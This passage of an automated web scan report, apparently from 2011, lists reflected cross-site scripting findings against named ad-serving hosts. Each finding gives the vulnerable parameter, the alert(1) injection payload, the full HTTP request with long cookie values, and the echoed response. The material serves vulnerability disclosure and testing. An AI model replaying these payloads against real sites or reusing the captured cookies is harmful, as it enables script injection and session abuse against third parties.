2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253Dbe996"%3balert(1)//1db96dd04f2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:22:43 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 18:31:13 GMT
ETag: "289520-1042-4a41de8c3de40"
Accept-Ranges: bytes
Content-Length: 8946
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
vertising.com%2Fclick%2Fsite%3D0000768034%2Fmnum%3D0001004441%2Fcstr%3D27582677%3D_4dfa489d%2C2306156771%2C768034%5E1004441%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D27582677%2Foptn%3D64%3Ftrg%3Dbe996";alert(1)//1db96dd04f2");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ib.adnxs.com/click?AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2
...[SNIP]...

3.131. http://img.mediaplex.com/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d93c7'%3balert(1)//ee5a96f4c16 was submitted in the mpvc parameter. This input was echoed as d93c7';alert(1)//ee5a96f4c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82997_US_2011_Q2_Fathers_Day_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-0%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768034%26Perf_Tracker_2%3D0001004441%26Perf_Tracker_3%3D1183%26adid%3D328092%26imp_id%3D425067938274493911%26fcid%3D328082%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240963344343%26imp_rvr_id%3D240963344343&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240963344343&imp_rvr_id=240963344343&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAANdFQqoJJeYF_ayDGovBdy-dSPpNAAAAAGY2BwBkAAAAZAAAAAIAAACgDgUAh7wAAAEAAABVU0QAVVNEANgCWgBiIAAA-xAAAgMCAQUAAAAAOBN3yAAAAAA.%2Fcnd%3D%213AQEKQj4uwIQoJ0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F728x90%252Fatf%253Ft%253D1308248219121%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768034%252Fmnum%253D0001004441%252Fcstr%253D27582677%253D_4dfa489d%252C2306156771%252C768034%255E1004441%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D27582677%252Foptn%253D64%253Ftrg%253Dd93c7'%3balert(1)//ee5a96f4c16 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248219121&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:22:45 GMT
Server: Apache
Last-Modified: Wed, 25 May 2011 18:31:13 GMT
ETag: "289520-1042-4a41de8c3de40"
Accept-Ranges: bytes
Content-Length: 8946
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );
(function(){
var mojosrc;
var mpserv;
var protocol = window.location.protocol;
if (protocol == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.
...[SNIP]...
vertising.com%2Fclick%2Fsite%3D0000768034%2Fmnum%3D0001004441%2Fcstr%3D27582677%3D_4dfa489d%2C2306156771%2C768034%5E1004441%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D27582677%2Foptn%3D64%3Ftrg%3Dd93c7';alert(1)//ee5a96f4c16http://rover.ebay.com/rover/1/711-126780-2042-0/4?mpt=1308248221&siteid=0&Perf_Tracker_1=0000768034&Perf_Tracker_2=0001004441&Perf_Tracker_3=1183&adid=328092&imp_id=425067938274493911&fcid=328082&ir_DA
...[SNIP]...

3.132. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph1-gps-locate-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cee9"%3balert(1)//c9f3c04e5cc was submitted in the mpck parameter. This input was echoed as 8cee9";alert(1)//c9f3c04e5cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph1-gps-locate-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D34855710208cee9"%3balert(1)//c9f3c04e5cc&mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248528777&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=9608:2042/17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:22:50 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:46 GMT
ETag: "3bd347-bf8-498a5f5b2bc80"
Accept-Ranges: bytes
Content-Length: 6420
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=34855710208cee9";alert(1)//c9f3c04e5cc\" target=\"_blank\">
...[SNIP]...

3.133. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-locate-728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph1-gps-locate-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fff90"%3balert(1)//8c061968973 was submitted in the mpvc parameter. This input was echoed as fff90";alert(1)//8c061968973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph1-gps-locate-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D3485571020&mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg=fff90"%3balert(1)//8c061968973 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248528777&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo2=14302:16279/13198:5934; mojo1=s/137381247401/80; mojo3=9608:2042/17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:23:17 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:46 GMT
ETag: "3bd347-bf8-498a5f5b2bc80"
Accept-Ranges: bytes
Content-Length: 6396
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
ashVars\" VALUE=\"clickTAG=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg=fff90";alert(1)//8c061968973http://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D3485571020&clickTag=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^
...[SNIP]...

3.134. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1f18b<script>alert(1)</script>f9b215dd1f1 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076081f18b<script>alert(1)</script>f9b215dd1f1 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLvvNzMJZjpnHtrXN5qKIO+EM5z5agvMeBQJyB/E+z0r03k+Hy5oZ++Kg6mfGblUj57YR9HJ4U08Ynvq8C709kgjf+lOrStTYCbr/angppkIGSOkPPAp/mypKNZbjcB72v/jlVFJmIjOFrxYR4kFS17wMqCDVOPoO/NliIQixDmzoM2F1CkrGVjf4TNCnwMD1vr40K3uB3N33JQLdidrN+E9QkSn6qtaTPH5RnuEJ3mzJ9t2p3TRwWBNid2On9+fUJyTz30R2aORRA0UfqPScHlRLqFTcoQm40NzTqj+/2Vy5VSXRWGSc27JMDcd8UNgaC0BO18gVnBFnQ6+jpUwnwfHMfBWHtTJvx1HIhpaKtfGBxyV+ES3D1XCQTpUbiMJRE32Ktb+m+c0zKY6N35B0CY6xaxUeUTS6CmxVOtONznG42bm7Cp73/0XB7cUbyNLzX6uKi3zPpyRn5e7qRqkr+Vz7xZncif6W33yar0JjnbGu2N47Pwzcm7HwtAIRfE5V0yxwy/3qMnCThiEl84VQAzlm2xUbzWX8IPzExoEMfF+yzSX56mKClUyzrAdhMb4SzA+ThPGTPslDr+gIzSHG03Ux1LnaLbAYfDlU+6tMXaZNvWWPKTxTFz4ICyohFWBdQH8T2/2zd3Rh9qtIm3SYCAThcJNcDZIE5O42lw95s+a3fJrJPgR8Muuxs0SjbTsP3hghX02EHvyFysd2bbECslVMLrdpk4xBa1ZLO7ZeuPl3I6BKWjMCpKwQeVEdjD2N0/Hey+2XjLSol7KGlWXwmIZwnxM31au1EPUwG82Ub8DOfzXwbmFN7m7dp1GFIrihpAsr+NYHZmoA/Cz6Wq1dHaQuqwZXr7l0g8z+AqPwnJyigXx1ybKbx+2/f+QNvo+kk6TCYcZelBtmDGAEIuvyivhZFjqgH9+L+hKu4dDNZ0IEzhvR/Oqf86/1RHrRV46lhrwOxyNhZx7hIKCTaeahRNFnt5g7RgzN6KqqB6674vIMWTvfgG7cYXsM2rrEk/CzN62KGFg735e56rGI4iMox3LUac+9A5CVIj/dyNwQa5bI3zR2pecGRfc17HQ3mNNQyOtTIwLN1dmPMmdpcJimepeI2r+OvMy5/1tlEvFpiwpAVPI1+Z4cyHXCEBN/x4pmz9VrhKlIKa/udFMHuwQkj74k9CbECtFv0QC1+Sa2hUSCO5fa/rSjP9yX5uPpQFsaggKqwSpw//kWvk8tvD3pywQ9BBmsdFCXm74ltkGZtHSu+p4wrwRZH2oHP9B96bjFejkxT7/PHehmAG0v/wo2RIdMNgTgJpVwlHKx3kDOhhGprNjp0VsqRhMr3gmihVy/J0eptWVkGRN4cjbebh9RX11SGgDuH4CNnBRtu+iSfhX6MElzezQU+WLL0BJWr1QOzAaQ8dGB1ecqpMlPCAadwUsHBNeAcuZjL9O8BRFfoHQ/xIwA2eEEi5oVNP1ehj8G+QqdKYyvs6LIuwyeaY6lHfRl7hnmRrf/BhLV3s3qZ0+uFCAIlYlGTDwZyr9CxDXNm2t2+HL3MFvNzD7K1dKiBNpeBWl3GhZTcQ7n6S/EstIeQhBTfLVklV8DW+TnKM/3RR9Csqcr9I9eSY9Yn9cA+fYhYaIJeE3SgkMU6hxuUgWgN83Xp5Ze+MiFR1YqDF8gmdiJ+kil4tjFpSMeN+i09MYNT6tglwjwDIly+9CahdX8PB3GjIhAQd/YZ5Yu2AsX6VgsmuDDrnMhH0t/a0A1n2RYrVnHQosOVtU+tNgYMjX0Ugy+FpLChRmW8p9uv52zQWvIm1mQNZkNAJSWykdMycOxsZ+8nAulTJFe3Rg8GnAZBEHZ+fl8vSPQEjlc3uzttwlEBou/ICBay1z6otJLWip3g==; rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOUyRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifqe1pBlZ259HXaBJ50bcPs5W6UrbuxwwykkmBfvTGdhY6R36hDP9GcRo3IMQKLboYAZUAD6b705sfN2AyaDbgmLf3ZERjZTjw5bBLQ9fbKsIhBlYFUM4XFud47GCjJTwGuwc1LM95tG5AFzx9tnwsgvVNaovbwq2L9N/YKANEQv8X2qIyy+X6kp2cftNCti8OnGgKDOj8KjUySG9pekHu4As1aZJIbEGxWjO+KA6xjX9kaVSObtWvl8I9hp4IH7INgoU0uq+mPXynexYaV+bmSiifClg+RGshM2vhG0UyUpJ0UynUzma61vniue1+wkfmg3et6cr2sqzQSRUj1pHr2rWAZQJDaflpCOk=; rtc_AhSj=MLvP+TcJJjpr5xIV3bfcCIyrbjWqZguxoCxXBBzPT7v2byWAFuUENcdS/wgc8b8neDAju2MnTSkavGQzbnAmlmKaam9hR2f4zmYIBMAXfyo1soUC55YXz/ycbzs5PoMTzZ6ft5brU8oTs2g2EwG6BkT9Qis9O3EaX+qeFcrX3mFCE8GAyc8x9Wv5IvtYd0NjJbzmwPpQdINHF6OH9BpLrIIOIIdGkspXpI+9fF8X9LRloqJzHHLdHOjNv9c3+dz76M9BlHTJ3bZtYHhhwspmcNFwiANiJgA0Psi09lHWf5KmKzOk6bLIPtfZKVYDMwBGgtpfgRGBfVqpI+A9AOQvixCosw98mJ3iGWx6taMHVBbjxMTPZHxh/GqSd9hRSpJWjAowNY7BLIp6DLIEOILPYrfL3j29d/hFQ8WHFedMr0IGLg2V0+MdazA4polXooz5IdtMFmBpcO8b4dA1aIST3VdpbM0uez/pEaDa1RHmcQaIXtu+fdWCvoZXNuowU0KA1kHkaBg3wCoX1HBg/j25NvO6E9srlPuM9ydpd6+lzHX0JAx0HUoBXUD3iWeQ3x4+EH5EOPTnnb+XZN9SrS8Xc9wsFlSOgs8FDBoSlQiFf8zYZqKhqkGc6xhBDT5fdMwWGoqoRuv/7Y+lwLtn3mMMX9RdxG3iF/DvR/YcOguNEg7t3GgoRipl3CiRFwAN9U1rry5rnMuJNKNiqDHjvQlkloN27BM3BSosmXmypM9SehEpqfHipPTCkgMiuH/Hfu0ROZhhvFHR3s1Tg2pbzmW2oMjFs2GruGKccqKQB53ONKbfG987MX6pMEd/Ov8aZaMrJeoO8f7yy5tYYpUpENZwYmvzy8/M//zKomJoRrfhDST2bd9/mEgXWh8sFoeZ0HrivPi7vyUARl4Y762oHJQWWz2hKii+5cNHZzBhW42ktzOjCzJb9t9z5LSVUudL3GKjkX2clIFTj0mVfGoRkDQWniR9HYELfepOz6xIjAt0pSvr7ywc+4loYuciK3mK7kZQdbEtwbjsoEazCUIHBpfV7YMQfSlqD+BRcIZs4KX1I29h/nVPbBCKwddGbTBZ8tf8LFs3QoBZKUl6S7Xxv49rB2A7JQG0tbeJlATuGpuQWRwI1At84hOxcdov75AWTDR8NV8rC0SqT1CCH8Z1tQlvOF4VipncK+6w/Jfdp